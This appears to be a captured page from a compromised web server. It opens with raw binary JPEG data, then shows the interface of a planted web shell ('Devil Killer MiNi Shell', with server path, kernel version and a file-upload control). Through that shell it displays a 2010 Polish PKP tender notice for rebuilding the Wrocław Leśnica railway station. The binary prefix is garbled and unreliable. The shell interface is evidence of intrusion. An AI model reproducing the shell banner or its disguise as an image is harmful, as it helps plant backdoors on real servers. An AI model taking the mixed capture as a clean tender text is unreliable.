JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/102280-N-2010.html

<p class="kh_header"><b>Wrocław: WYKONANIE ROBÓT BUDOWLANO - MONTAŻOWYCH DLA  PROJEKTU PN.
 PRZEBUDOWA DWORCA KOLEJOWEGO WROCŁAW LEŚNICA</b><br>
<b>Numer ogłoszenia: 102280 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PKP Spółka Akcyjna Oddział Gospodarowania Nieruchomościami we Wrocławiu , ul. Joannitów 13, 50-525 Wrocław, woj. dolnośląskie, tel. 071 717 13 33, faks 071 717 54 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nz.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANO - MONTAŻOWYCH DLA  PROJEKTU PN.
 PRZEBUDOWA DWORCA KOLEJOWEGO WROCŁAW LEŚNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlano-montażowych dla projektów pn.Przebudowa dworca kolejowego Wrocław Leśnica  
Przedmiot zamówienia jest   zadaniem inwestycyjnym o  terminie realizacji 28 tygodni, którego składową jest projekt opisany w niniejszym OPZ.

Okres rękojmi wynosi 156 tygodni dla każdego wykonanego projektu i jest liczony od dnia uzyskania pozwolenia na użytkowanie po dokonanym wcześniej odbiorze końcowym. Zamawiający dopuszcza rozpoczęcie okresu rękojmi odrębnie dla każdego projektu.

Wymieniony w Części I pkt 9.1 SIWZ Kluczowy Zespół Ekspertów stanowi jedynie minimalne wymagania Zamawiającego, które Wykonawca powinien potraktować dyrektywnie lecz nie obligatoryjnie.  Zamawiający dopuszcza dla rzetelnego i skutecznego wypełnienia zobowiązań Wykonawcy wskazanie dodatkowych osób, ponad wymagane minimum, na poszczególne stanowiska wedle uznania Wykonawcy. Wykonawca jest odpowiedzialny za jego prawidłowy dobór.  Wskazane dodatkowe osoby na poszczególne stanowiska muszą spełniać warunki udziału w postępowaniu opisane w Części I pkt 9.1 B.3 SIWZ.  


II.  Przebudowa dworca kolejowego Wrocław Leśnica

1. PRZEZNACZENIE I PROGRAM UŻYTKOWY BUDYNKU 

1.1.	OGÓLNA CHARAKTERYSTYKA BUDYNKU - RYS HISTORYCZNY
              Budynek pełni funkcje dworca kolejowego. Został wybudowany prawdopodobnie w latach 50 lub60 XIX w, 
              technika tradycyjną - murowaną.
              Główny budynek stacji był złożony na planie prostokąta, jednopiętrowy z poddaszem, nakryty dachem 
              Dwuspadowym. Dwie skrajne osie niesymetryczne wyodrębniał od strony frontowej i od strony peronu 
              pozorny ryzalit zamknięty szczytem z osobnym zadaszeniem. Do budynku przylegały dwie boczne parterowe 
              przybudówki. Centralny hol znajdował się na parterze, za wejściem głównym. W holu znajdowała się kasa 
              biletowa. Obok z jednej strony były dwie poczekalnie dla pasażerów pierwszej i drugiej oraz trzeciej i czwartej 
              klasy, oddzielone szynkiem z osobnymi bufetami. Z drugiej strony znajdowały się pomieszczenia służbowe i 
              klatka schodowa. Na piętrze umieszczono lokale mieszkalne dla pracowników stacji. Otwory okienne oraz 
              wejścia były zamknięte odcinkiem łuku i ujęte w tynkowe obramowania opaskowe z prostymi gzymsami 
             nadokiennymi. Okna pierwszego piętra spoczywały bezpośrednio na gzymsie kordonowym. Wejścia główne 
             poprzedzały schody z murowaną balustradą.
Projektowana przebudowa budynku dworca umożliwi poprawę standardu obsługi podróżnych i poprawę stanu technicznego obiektu oraz jego funkcjonalność.
W budynku zostanie wymieniona instalacja elektryczna wewnętrzna, wodno-kanalizacyjna wewnętrzna, telefoniczna, oraz zostanie wykonana sieć komputerowa i internetowa, instalacja systemu informacji wizualnej oraz monitoring z włączeniem do systemu SOK, zgodnie ze stosownymi przepisami i wymogami Ppoż, SANEPID oraz BHP. 

1.2. FORMA ARCHITEKTONICZNA 

Mając na uwadze istniejący układ pomieszczeń w budynku dworca, wytyczne konserwatora zabytków oraz wymogi ppoż starali się zaprojektowano przebudowę wnętrza budynku, tak by był funkcjonalny i spełniał współczesne standardy obsługi podróżnych, poprawę stanu technicznego poprzez przebudowę  wszystkich pomieszczeń dworca, odbudowę klatek schodowych, renowację piwnicy oraz elewacji.  
Wejście główne prowadzi do poczekalni dworca. W niej umieszczono ławki dla podróżnych oraz automaty do biletów. Po prawej stronie wejścia ławki ustawiono w kształcie podkowy, starając się stworzyć namiastkę wydzielonej poczekalni. Brak trwałego wydzielenia umożliwia stały wgląd na ten obszar holu, co ma wpływ na bezpieczeństwo podróżnych. 
Po prawej stronie poczekalni znajdują się okienka kasowe, które należy wymienić oraz dostosować wysokością blatu do potrzeb osób niepełnosprawnych. Naprzeciwko kas, nad ławkami wyznaczono miejsce na tablicę informacyjną przyjazdów i odjazdów pociągów. Po lewej stronie pomieszczenia poczekalni zaprojektowano sanitariaty dla podróżnych. W dalszej części budynku wyznaczono pomieszczenie na cele komercyjne z dostępem od strony peronów. 
Istniejące pomieszczenie kablowni projektuje się odnowić, a na miejscu obecnej toalety zaprojektowano pomieszczenie gospodarcze. Boczne wejście, od strony peronów, prowadzi do kasy towarowej oraz pokoju klienta. Drzwi prowadzące z komunikacji do pomieszczenia klienta zostały dodatkowo zabezpieczone kratą. W miejscu pomieszczenia (ekspedycja)  zaprojektowano dla pracowników dworca pomieszczenie socjalne wraz z sanitariatem. 
Budynek dworca, ze względu na obowiązujące przepisy, należy docieplić. Zgodnie z wytycznymi konserwatora zabytków ściany należy ocieplić od wewnątrz.


1.3. PROJEKTOWANE ROZWIĄZANIA KONSTRUKCYJNE, OGÓLNOBUDOWLANE I MATERIAŁOWE - STAN ISTNIEJĄCY 

1.3.1. FUNDAMENTY 
Ławy fundamentowe ceglane. Budynek nie posiada widocznych pęknięć, ani rozwarstwień spowodowanych osiadaniem lub spękaniem fundamentów, co wskazuje na prawidłową pracę fundamentów przekazujących obciążenie na grunt. 
Jedynie ściana frontowa od strony peronu przy kasie towarowej wykazuje spękania przy otworach okiennych piętra, spowodowane prawdopodobnie oddziaływaniami ruchu pociągów. 
Przy pracach remontowych należy odsłonić fundament spękanej ściany (w dwóch miejscach) i skontrolować stan techniczny posadowienia. W przypadku widocznych spękań lub uszkodzeń fundamentów należy skontaktować się z projektantem! 

 
1.3.2. ŚCIANY FUNDAMENTOWE 

 Ściany piwnic z cegły pełnej gr.64cm oraz 38 i 25 cm. Konstrukcyjnie nie wykazują wyboczeń ani pęknięć. 
Wyprawy tynkarskie ścian piwnic posiadają braki i są częściowo odspojone. Odspojenia należy usunąć. Następnie wykonać nowe wyprawy. Na ścianach piwnic należy wykonać izolację przeciwwilgociową. 


1.3.3. STROPY 

Stropy pośrednie budynku o konstrukcji drewnianej oraz stalowo-ceramiczne. Stan techniczny stropów budynku ocenia się jako dobry.

1.3.4. ŚCIANY CZĘŚCI NADZIEMNEJ 

 Ściany części nadziemnej murowane z cegły pełnej o zróżnicowanej grubości 25-64cm, obustronnie otynkowane. Ściany nie wykazują zarysowań ani spękań. Ich stan techniczny jest dobry. 
Jedynie ściana frontowa od strony peronu przy kasie towarowej wykazuje spękania przy otworach okiennych piętra spowodowane prawdopodobnie oddziaływaniami ruchu pociągów. 
Liczne odspojenia tynku należy skuć (fragment), uzupełnić spoiny w murze ceglanym i wykonać nowy tynk (odtworzyć). 
Wyprawy tynkarskie ścian zewnętrznych posiadają braki i są częściowo odspojone. Odspojenia należy usunąć (szczególnie przy wodotrysku ściennym oraz przy pomieszczeniu kasy towarowej). Następnie wykonać nowe wyprawy. 


1.3.5. KOMINY I PRZEWODY KOMINOWE 

Murowane z cegły pełnej w dobrym stanie technicznym. Uszkodzone korony kominów i murków należy rozebrać i wymurować nowe. 

1.3.6. ŚCIANKI DZIAŁOWE 

Ścianki działowe wykonane z cegły pełnej obustronnie tynkowane. W dobrym stanie technicznym. 

1.3.7. KLATKA SCHODOWA 

 Schody o konstrukcji drewnianej w dobrym stanie technicznym. Należy dokonać remontu biegów schodowych i balustrad. Usunąć stare powłoki malarskie i nałożyć nowe. 
Ponadto należy zorganizować zamknięcie piwnicy, tak by dostęp do niej miały tylko mieszkańcy oraz osoby do tego upoważnione. Schody do piwnicy zaopatrzyć w balustradę, uzupełnić stopnie. 
Istniejące przewody elektryczne oraz instalacje sanitarne, należy schować w bruzdach ścian a odkryte obecnie liczniki zamknąć w szafce, by nie dopuścić do nich osób niepożądanych. 


1.3.8. DACH 

 Dachy dwuspadowe pokryte papą o konstrukcji drewnianej w złym stanie technicznym. Należy dokonać wymiany pokrycia dachowego (papy), skorodowanych elementów drewnianych: deskowania i belek konstrukcyjnych oraz wykonać nowe obróbki blacharskie. 
Elementy drewniane należy zaimpregnować przeciwpożarowo, przeciw owadom i grzybom do cech NPO. 


1.3.9. WYKOŃCZENIE OBIEKTU - ELEWACJE 

 Elewacje budynku są w dobrym stanie technicznym. Należy usunąć graffiti oraz zabezpieczyć elewacje specjalnym środkiem antygraffitowym. Należy uzupełnić ubytki wypraw tynkarskich. Zawilgocone ściany osuszyć, a następnie wykonać izolację przeciwwilgociową. 
Widoczne ubytki muru należy uzupełnić. Zgodnie z historycznym wyglądem budynku należy odtworzyć dekorację architektoniczna elewacji. 
W związku ze złym stanem technicznym, należy wymienić stolarkę okienną i drzwiową. Należy zwrócić szczególną uwagę na odtworzenie detalu na ramach okiennych oraz na drzwiach. Ponadto należy wyremontować klamkę w drzwiach bocznych na elewacji frontowej. 
Wszelkie wiszące na elewacjach kable należy usunąć. Należy wymienić tablice informacyjne dworcowe. Na budynku znajdują się szpecące lampy typu latarnia. Należy je zastąpić nowym oświetleniem elewacyjnym 

2. INSTALACJE 

2.1 INSTALACJA CENTRALNEGO OGRZEWANIA. 

Instalacja c.o. wykonana w obiekcie została zmodernizowana stosunkowo niedawno, w związku z czym projektuje się pozostawienie jej w stanie istniejącym, dokonując jedynie wymiany uszkodzonych grzejników oraz w możliwych miejscach schowanie podejść do grzejników w bruzdach ściennych. 

2.2. KOTŁOWNIA OLEJOWA 

Kotłownia olejowa została wykonana stosunkowo niedawno, w związku z czym projektuje się pozostawienie jej w stanie istniejącym. Zarówno dobry stan techniczny jak i koszt przebudowy na inny rodzaj paliwa nie uzasadniają jej przebudowy. 

  2.3 INSTALACJA WODOCIĄGOWA. 

Projektuje się wykonanie instalacji zimnej i ciepłej wody z rur wielowarstwowych typu PEX-AL.-PEX. Rozprowadzenie przewodów do przyborów w bruzdach ściennych. W zakres projektu wchodzi również wymiana poziomów w piwnicy oraz pionów zasilających mieszkania znajdujące się nad pomieszczeniami dworca. 
Zabezpieczenie ciepłej wody użytkowej nastąpi w oparciu o indywidualne elektryczne podgrzewacze przepływowe. 

2.4 INSTALACJA KANALIZACYJNA. 

Projektuje się wykonanie kanalizacji z rur kielichowych z PVC łączonych na uszczelki gumowe. Podejścia do przyborów biegnące nad posadzką, ze względów estetycznych umieścić w zakrytych bruzdach ściennych. W zakres wchodzi również wymiana poziomów w piwnicy oraz pionów kanalizacyjnych. Piony główne wentylowane będą wywiewkami ponad dachem. Wywiewki - producenta rur. W ubikacjach z pisuarem - kratki ściekowe z PVC z kratką ze stali nierdzewnej oraz syfonem.

2.5 WENTYLACJA 

Projektuje się pozostawienie wentylacji grawitacyjnej jako przewodniej. Planuje się wymianę wszystkich kratek oraz kanałów wentylacyjnych. Kanały wykonać z blachy ocynkowanej. W poszczególnych pomieszczeniach projektuje się wentylatory systemowe. Zaprojektowano również wentylację mechaniczną jako wspomagającą - wg opracowania projektu instalacji sanitarnych. 
 

3. LOKALIZACJA ORAZ STAN ISTNIEJĄCY 

3.1. LOKALIZACJA I STRUKTURA WŁASNOŚCIOWA 

Budynek dworca jest usytuowany we Wrocławiu na działce o nr 41/7, AM-15, obręb Leśnica, Gmina Wrocław Fabryczna, przy ulicy Burczaka 20. Właścicielem działki jest skarb Państwa. Inwestor jest wieczystym dzierżawcą terenu objętego opracowaniem.
 
3.2 WYZNACZNIKI ROZWIĄZANIA PRZESTRZENNEGO 

Obszar objęty opracowaniem stanowi działkę o numerze ewidencyjnym: nr 41/7, AM-15, obręb Leśnica, Gmina Wrocław Fabryczna, przy ulicy Burczaka 20. 
Projekt przebudowy obiektu został ukierunkowany przez wytyczne konserwatora: 

Zawarte w zaopiniowanych przez Miejskiego Konserwatora Zabytków projektach, ustalenia do uwzględnienia w projekcie:
	 - remont elewacji dworca zaprojektować, z odwzorowaniem stanu z przebudowy stacji z lat 20-tych XX w. - zaprojektowano remont elewacji na podstawie zdjęć archiwalnych oraz dokumentów archiwalnych znajdujących się w Archiwum Budowlanym Miasta Wrocławia 
	- kolorystyka elewacji: należy wykonać badania stratygraficzne tynków, okien, drzwi i zewnętrznych elementów więźby, 
	- stolarka drewniana - zaprojektowano stolarkę drewnianą 
	- zabudowa zegara kolejowego na elewacji południowej, w miejscu historycznym, - zaprojektowano zegar kolejowy w miejscu historycznym 
Zgodnie z pierwotnym przeznaczeniem budynek będzie pełnić funkcję dworca. Niezbędne jest przeprowadzenie remontu wnętrza jak również elewacji. 
We wnętrzu budynku niezbędne jest wyremontowanie wszystkich pomieszczeń oraz remont klatki schodowej. Na elewacji południowo-zachodniej należy umieścić zegar ścienny. 
Planuje się przeprowadzić renowacje piwnicy. 
Wymiary otworów drzwiowych muszą zostać doprowadzone do zgodności z dzisiejszymi przepisami. Istniejące instalacje wewnętrzne jako nie spełniające wymogów planuje się wymienić na nowe. 
Naprawy i uzupełnienia wymagają detale elewacyjne w całości zachowane na budynku takie jak gzymsy. Należy wymienić orynnowanie. Obce elementy na elewacji takie jak kraty stalowe w oknach, należy usunąć. 
Zgodnie z wymogami konserwatora zabytków, wykonano badania stratygraficzne tynków, okien, drzwi i zewnętrznych elementów więźby. 
Wyniki badań tynków zewnętrznych wykazały, że pierwotnie budynek pokryty był tynkiem strukturalnym dwuwarstwowym. Kolor elewacji uzyskano poprzez barwienie w masie zaprawy i jest nią naturalny kolor zaprawy, lekko złamany kolorem kruszywa. Fakturalny jasny tynk na powierzchniach gładkich kontrastuje z nieco ciemniejszymi opaskami otworów drzwiowych i okiennych. Opaski okienne, cokół, schody, ościeża drzwiowe wykonane były z zaprawy z domieszką cementu - tworząc efekt sztucznego kamienia. Elementy te posiadają ozdobnie opracowaną powierzchnię w formie równoległych rowków - wgłębień imitujących dukt dłuta kamieniarskiego. Nie znaleziono kolorystyki okien. Podbitka więźby dachowej malowana była na brązowo. 
Ostateczny wygląd elewacji i efekt kolorystyczny powinien być bezwzględnie poprzedzony próbami na obiekcie in situ. 
Badania stolarki wykazały, że była poddawana renowacji - szczególnie dotyczy to drzwi głównych wejściowych. Na drzwiach wejściowych od strony peronów stwierdzono pierwszą warstwę farby w kolorze ciemnej zieleni. 
Na bocznych drzwiach wejściowych do klatki schodowej zachowało się ozdobne okucie - szyld na klamkę z główka aniołka. 
	

3.3 PROGRAM KUBATUROWY 

 Powierzchnia zabudowy - 457,99 m2
Powierzchnie utwardzone - 532,59 m2 
Wysokość budynku - 12,26 m 
Kubatura budynku - 2968,74 m3 
Geometria dachu: 
Dach stromy -15o spadku 

III. Materiały Zamawiającego i działania realizowane przez Zamawiającego

Na zlecenie Zamawiającego wykonana została dokumentacja projektowa (projekty budowlane i wykonawcze).   Projekty budowlane i wykonawcze    zostaną przekazane Wykonawcy po zawarciu Umowy. 
                                                                       
IV. Działania realizowane przez Wykonawcę

Zadaniem Wykonawcy poprzez kluczowy zespół ekspertów jest realizacja projektu inwestycyjnego polegająca na wykonaniu robót budowlano-montażowych dla projektu pn.Przebudowa dworca kolejowego Wrocław Mikołajów wraz z uzyskaniem decyzji o pozwoleniu na użytkowanie obiektów.
 
W celu realizacji inwestycji zostanie zawarta j umowa na wykonanie robót budowlano-montażowych w okresie od  czerwca 2010r do grudnia 2010r. (w tym odbiory końcowe, testy, uzyskiwanie formalno-prawnych decyzji o pozwoleniu na użytkowanie). Zadanie inwestycyjne jest wielobranżowe o wysokim stopniu złożoności.  
Terminowe wykonanie prac na poszczególnych odcinkach robót będzie wymagało dużego zaangażowania personelu Wykonawcy oraz wszystkich zainteresowanych realizacją projektu.
Wykonawca zobowiązany jest do śledzenia przepisów prawnych odnoszących się lub związanych z osiągnięciem wysokiej jakości i zgodności z przepisami prawnymi wykonywanych robót budowlano-montażowych.

Obowiązkiem Wykonawcy jest w szczególności, sporządzanie:
-	miesięcznych protokółów odbioru wykonanych robót i uzyskanie akceptacji nadzoru inwestorskiego,
-	miesięcznych Raportów o postępie pracy, które powinny  zostać sprawdzane pod względem merytorycznym i zaakceptowane przez nadzór inwestorski,
-	harmonogramu rzeczowo-finansowego dla realizacji projektu i uzyskanie akceptacji nadzoru inwestorskiego oraz zatwierdzenia przez Zamawiającego,
-	dokumentacji budowy.

Wykonawca w razie zaistnienia okoliczności zmiany harmonogramu rzeczowo-finansowego, dokonuje jego aktualizacji. Zaktualizowany harmonogram (z określeniem dnia jego aktualizacji) Wykonawca przedkłada nadzorowi inwestorskiemu do akceptacji Zamawiającemu do zatwierdzenia.


V. UWARUNKOWANIA REALIZACYJNE

1. Uwagi ogólne

Szczegółowy opis przedmiotu zamówienia określają: projekty budowlane i wykonawcze, przedmiary robót oraz specyfikacje techniczne wykonania i odbioru robót, stanowiące załączniki do niniejszej SIWZ. Przy wykonywaniu prac niezbędne jest zachowanie wszystkich wymogów jakościowych, technicznych i bezpieczeństwa określonych w obowiązujących przepisach prawa, oraz odpowiednich norm.
Ujęte w dokumentacji technicznej nazwy handlowe i znaki towarowe zastosowanych materiałów i technologii, należy traktować jako rozwiązanie przykładowe określające parametry i standard jakościowy. Dopuszcza się zastosowanie materiałów, technologii innych producentów pod warunkiem, że będą one równoważne, posiadają one dopuszczenie do stosowania zgodnie z wymogami ustawy z dnia 7.07.1994 r. Prawo budowlane (Dz. U.  z 2006 r. Nr 156 poz. 1118 z późn. zm.), ustawy z dnia 16.04.2004 r. o wyrobach budowlanych (Dz. U. nr 92 poz. 881) oraz spełniają parametry określone w dokumentacji projektowej.

2  Założenia do wykonania przedsięwzięcia

Realizacja projektu uzależniona jest od:
- dobrej współpracy pomiędzy Wykonawcą a Zamawiającym i nadzorem inwestorskim.
- doświadczenia i kwalifikacji Kluczowego Zespołu Ekspertów odpowiedniego do wymagań projektu,
- właściwego przygotowania oraz adekwatnego do zlecenia stanu dokumentacji  i materiałów zawartych 
  w opracowaniach eksperckich (ekspertyzy, opinie techniczne, inwentaryzacje)

3.  Ryzyko

Ryzyko obejmuje:
      -  proces przetargowy na wybór wykonawcy robót budowlano-montażowych będzie dłuższy niż  planowany, 
         co może skutkować opóźnieniem rozpoczęcia realizacji umów,
      -  opóźnienie związane z otrzymaniem decyzji administracyjnych zezwalających na podjęcie realizacji robót
          i pozwoleń na użytkowanie,
              -  opóźnienia w robotach podstawowych z powodu nieprzewidzianych okoliczności,
      -  siłę wyższą,
       

VI. ZAKRES PRAC WYKONAWCY

      	1. Uwagi ogólne
Roboty budowlano-montażowe winny być wykonywane przez Wykonawcę zgodnie z prawem i wymaganiami określonymi w: pozwoleniu na budowę, decyzji organów konserwatorskich a także polskim Prawem budowlanym (tekst jednolity D.U. z 2006 nr 156 poz.1118), przy udziale PKP S.A Oddział Gospodarowania Nieruchomościami we Wrocławiu. działającej w charakterze Zamawiającego.
Wykonawca będzie odpowiedzialny za projekt, począwszy od analizy dokumentacji budowlanej (projekt budowlany i wykonawczy), specyfikacji technicznych wraz z przekazaniem Zamawiającemu ewentualnych wniosków i uwag celem akceptacji, aż do zakończenia robót budowlanych i ich formalnego odbioru oraz uzyskania pozwolenia na użytkowanie.


Językiem umowy będzie język polski. Cała korespondencja, opisy, sprawozdania będą przygotowywane przez Wykonawcę w języku polskim.

2. Działania szczegółowe

Wykonawca, będzie zobowiązany do wykonania zamówienia w etapach realizacyjnych:

2.1. Etap przygotowawczy (do przekazania Wykonawcy placu budowy);
Obowiązki Wykonawcy na tym etapie obejmują:
     	 a.  przegląd i analiza otrzymanej od Zamawiającego dokumentacji:
	projektów budowlanych i wykonawczych,
	szczegółowych specyfikacji technicznych.
       b.  udział w komisji lokalizacyjnej zaplecza budowy powoływanej przez Zamawiającego/ Nadzór inwestorski
		z zasilaniem w media (woda, energia elektryczna, kanalizacja, łączą telefoniczne, ...) oraz ustalenia lokalizacji składowania materiałów dostarczonych na budowę,
c.	protokolarne przyjęcie  placu budowy oraz organizacja  zaplecza Wykonawcy w celu realizacji zamówienia
d.	przekazanie do akceptacji Zamawiającego Harmonogramu rzeczowo-finansowego realizacji projektu

2.2. Etap realizacji robót budowlano-montażowych
Obowiązki Wykonawcy na tym etapie budowy obejmują wykonanie robót budowlano-montażowych zgodnie z warunkami umowy i polskim Prawem budowlanym, a w szczególności:
1)	uzyskanie wszelkich niezbędnych uzgodnień i pozwoleń wcześniej nie uzyskanych i nie przekazanych przez Zamawiającego, a wymaganych przepisami prawa i niezbędnych do organizacji i prowadzenia robót,
2)	przed przystąpieniem do robót zasadniczych Wykonawca usunie wszystkie kolizje ujawnione w trakcie projektowania i przekazania terenu budowy
3)	realizacja robót budowlano-montażowych zgodnie z zatwierdzonym harmonogramem,
4)	prowadzenia robót zgodnie ze Specyfikacjami technicznymi wykonania i odbioru robót oraz polskim Prawem budowlanym,
5)	udział w comiesięcznych spotkaniach organizowanych przez Zamawiającego/Nadzór inwestorski, i udzielanie niezbędnych wyjaśnień organom kontrolnym,
6)	opracowanie niezbędnych projektów warsztatowych i technologicznych i przedłożenie ich do sprawdzenia i akceptacji  przez Projektanta i Inspektora nadzoru robót branżowych,
7)	 uzyskanie wymaganych prawem decyzji zmiany organizacji ruchu kołowego w związku z budową i poniesienie  kosztów organizacji zmian,
8)	Wykonawca jest zobowiązany, na etapie budowy, do ustawienia tablicy informacyjnej zgodnie z Prawem Budowlanym
9)	organizacja pracy i dobór sprzętu, które muszą uwzględniać zapewnienie bezpieczeństwa realizacji projektu na każdym jego etapie
10)	przeprowadzenia szkolenia w zakresie obsługi technicznej zainstalowanych urządzeń

2.3. Etap odbiorów końcowych i przygotowania dokumentów do uzyskania pozwolenia na użytkowanie obiektów.
Obowiązki Wykonawcy na tym etapie budowy obejmują:
1)	zgłoszenie Zamawiającemu / nadzorowi inwestorskiemu zakończenia robót budowlano-montażowych,
2)	sporządzenie dokumentacji powykonawczej zgodnie z Prawem Budowlanym i wymaganiami przepisów, obejmującą całość zrealizowanych robót z naniesionymi zmianami dokonanymi w trakcie realizacji  i po uzyskaniu akceptacji Projektanta i Nadzoru Inwestorskiego, przekazanie jej Zamawiającemu
3)	Geodezyjna dokumentacja  powykonawcza powinna być wykonana na mapie sytuacyjno wysokościowej w skali 1:500 w 3 egz oraz zarejestrowana w Kolejowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej oraz Miejskim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej
